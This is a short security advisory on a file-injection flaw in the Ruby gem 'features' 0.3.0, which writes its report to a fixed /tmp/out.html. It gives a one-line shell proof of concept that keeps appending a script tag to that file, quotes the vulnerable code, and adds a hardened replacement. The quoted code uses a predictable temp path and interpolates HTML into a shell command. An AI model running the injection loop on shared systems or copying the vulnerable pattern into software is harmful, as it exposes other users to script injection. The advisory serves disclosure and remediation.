The Ruby gem Features version 0.3.0 suffers from a file injection vulnerability that can lead to cross-site scripting.
Title: Features 0.3.0 Ruby gem file injection vulnerability
Date: 9/1/2013
Author: Larry W. Cashdollar @_larry0
Download: http://rubygems.org/gems/features
Description: "Plaintext User Stories Parser supporting native programming languages. Especially Objective-C"
Same vulnerability as http://vapid.dhs.org/advisories/show_in_browser.html
A malicious local user who creates /tmp/out.html first and keeps writing to it can inject arbitrary HTML into the file just before the gem opens it in the browser.
PoC:
nobody () sp0rk:/$ while (true); do echo "<script> alert('Hello'); </script>" >> /tmp/out.html; done
This pops up a JavaScript alert in the browser of any other user of the gem on the same machine.
Code:
+--------------------[./features-0.3.0/lib/suite.rb]-------------------+
def parse_results_and_open_in_safari(results)
  html = parse_results(results).html
  # Fixed, predictable path in the shared /tmp directory: any local user can
  # pre-create it and write to it before the report is opened.
  %x(touch '/tmp/out.html' && echo '#{html}' > /tmp/out.html && open '/tmp/out.html' )
end

def open_in_safari(html)
  %x(touch '/tmp/out.html' && echo '#{html}' > /tmp/out.html && open '/tmp/out.html' )
end
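As an added example (not code from the features gem), a hardened replacement for open_in_safari: the report goes into a freshly created, randomly named, owner-only file instead of the fixed /tmp/out.html, and the browser launcher is an assumed injection point so the behaviour can be exercised offline.

```ruby
# Added example, not the gem's own code: hardened replacement for open_in_safari.
require 'tempfile'
require 'tmpdir'

# Write +html+ to a freshly created, unpredictable, owner-only (0600) file and
# return its path. Tempfile.create opens with O_CREAT|O_EXCL and perm 0600, so a
# file or symlink planted in advance by another local user is never reused or
# followed, and the random name cannot be guessed and pre-filled with HTML.
def write_report_securely(html, dir: Dir.tmpdir)
  file = Tempfile.create(['features-report-', '.html'], dir)
  begin
    file.write(html) # plain Ruby IO: report content never passes through a shell
    file.flush
  ensure
    file.close
  end
  file.path
end

# Write the report and hand its path to a browser launcher. +launcher+ is an
# assumed parameter (default: macOS `open` in argv form, no shell involved);
# tests pass a lambda so no browser is actually started.
def open_report(html, dir: Dir.tmpdir, launcher: ->(path) { system('open', path) })
  path = write_report_securely(html, dir: dir)
  launcher.call(path)
  path
end

if __FILE__ == $PROGRAM_NAME
  # Constructed demo: a pre-planted out.html in the report directory is left
  # untouched and a separate 0600 file is created for the real report.
  Dir.mktmpdir do |dir|
    planted = File.join(dir, 'out.html')
    File.write(planted, '<!-- planted by another user -->')
    path = open_report('<h1>All features passed</h1>', dir: dir,
                       launcher: ->(p) { puts "would open #{p}" })
    puts "report written to #{path} mode=#{format('%o', File.stat(path).mode & 0777)}"
    puts "planted file unchanged: #{File.read(planted).include?('planted')}"
  end
end
```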
Vendor: Not notified